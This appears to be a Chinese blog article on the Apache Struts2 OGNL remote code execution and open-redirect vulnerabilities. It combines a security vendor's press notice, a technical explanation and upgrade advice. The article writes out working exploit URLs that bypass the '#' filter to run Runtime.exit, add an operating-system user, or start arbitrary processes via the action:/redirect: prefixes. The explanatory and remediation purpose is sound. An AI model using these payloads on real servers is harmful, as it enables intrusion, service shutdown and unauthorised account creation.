安全宝指出,Struts2被曝存在重大远程任意代码执行安全漏洞,影响Struts2全系版本。而对于此次堪比棱镜事件的危害,众多大型互联网厂商均存在该漏洞,且影响厂商仍在扩大之中。同时漏洞利用代码已经被强化,可直接通过浏览器的提交对服务器进行任意操作并获取敏感内容。目前安全宝用户暂可高枕无忧。同时也建议使用Struts开源架构的网站用户尽快加入安全宝云体系,以保护网站免受漏洞的威胁。
  据悉,Struts2漏洞由网安全宝在率先拦截到其***,漏洞涉及Struts2.0及以上的版本,是一个远程命令执行漏洞和开放重定向漏洞。利用漏洞,***可发起远程***,不但可以窃取网站数据信息,甚至还可取得网站服务器控制权。而且,目前针对此漏洞的自动化工具开始出现,***者无需具备与漏洞相关的专业知识即可侵入服务器,直接执行命令操作,盗取数据甚至进行毁灭性操作。

  安全宝联合产品副总裁吴翰清指出:“Struts2是一个帮助java开发者利用j2ee开发Web应用的开发框架,作为网站开发的底层通用模板,在大型互联网企业、政府、金融机构等网站建设中应用广泛。因此,此次Struts 2远程执行漏洞,将会威胁很多规模型网站。如今,开源架构下漏洞频频爆出,并且大多属于突发性威胁、爆发迅速快、波及范围广,这警示网站安全必须由一次性维护转向即时关注,以应对层出不穷的网站安全威胁。
看完上面的新闻后,相信大家都对Struts2的危害至少有了感性的了解,那么,下面再理性的分析下Struts2,先看下Struts2的原理,下面一起解开她那神秘的面纱吧...

Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数:

例如:?user.address.city=Bishkek&user['favoriteDrink']=kumys

ONGL将它转换为:

action.getUser().getAddress().setCity("Bishkek")

action.getUser().setFavoriteDrink("kumys")

这是通过ParametersInterceptor(参数过滤器)来执行的,使用用户提供的HTTP参数调用 ValueStack.setValue()。

为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的 unicode字符串表示\u0023,***者就可以绕过保护,修改保护Java方式执行的值:

此处代码有破坏性,请在测试环境执行,严禁用此种方法进行恶意***。所以,(传奇哥说)作为程序员也要有一定的职业操守,因为毕竟不是所有的网站都补了此漏洞,除了一些有名的门户网站。

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

转义后是这样:

?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1



OGNL处理时最终的结果就是

java.lang.Runtime.getRuntime().exit(1); //关闭程序,即将web程序关闭

类似的可以执行

java.lang.Runtime.getRuntime().exec("net user 用户名 密码 /add");//增加操作系统用户,在有权限的情况下能成功(在URL中用%20替换空格,%2F替换/)

只要有权限就可以执行任何DOS命令。


魔高一尺,道高一丈


2、解决方法

网上很多文章都介绍了三种解决方法,个人觉得将struts2的jar包更新到最新版本最简单,不用更改任何程序代码,目前最新版本2.3.4

下载到的更新包中有很多jar包,我系统中主要用到以下几个替换掉旧版本的:

commons-lang3-3.1.jar (保留commons-lang-2.6.jar)

javassist-3.11.0.GA.jar (新加包)

ognl-3.0.5.jar (替换旧版本)

struts2-core-2.3.4.1.jar (替换旧版本)

xwork-core-2.3.4.1.jar (替换旧版本)
Apache Struts 2安全更新,漏洞影响全系版本

Apache Struts团队6月底发布了Struts 2.3.15版本,由于该版本被发现存在重要的安全漏洞,因此该团队今天发布了Struts 2.3.15.1安全更新版本。


该版本修复的主要安全漏洞如下

1.  通过在参数前面加上“action:”/“redirect:”/“redirectAction:”前缀,以实现远程代码执行,如下:

代码

   http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}  

   http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}  

   http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}  


2.  通过在参数前面加上“redirect:”/“redirectAction:”前缀,以实现开放式重定向,如下:

代码

   http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/  

   http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23  


  为了防范***者可能利用此漏洞发起的***,网站管理员纷纷采取如下措施:

  1、DNSPOD的用户直在DNSPOD域名管理列表中开启安全中心,即可一键防御***。

  2 、从Struts2的官方网站下载最新的补丁程序,并尽快将Struts 2升级到最新的2.3.15.1版本,避免遭遇严重的安全***(下载地址http://struts.apache.org/download.cgi#struts23151)。鉴于Struts 2至今为止已经多次曝出严重的高危漏洞,如果不是必要,建议开发者以后考虑采用其它类似的Java开发框架。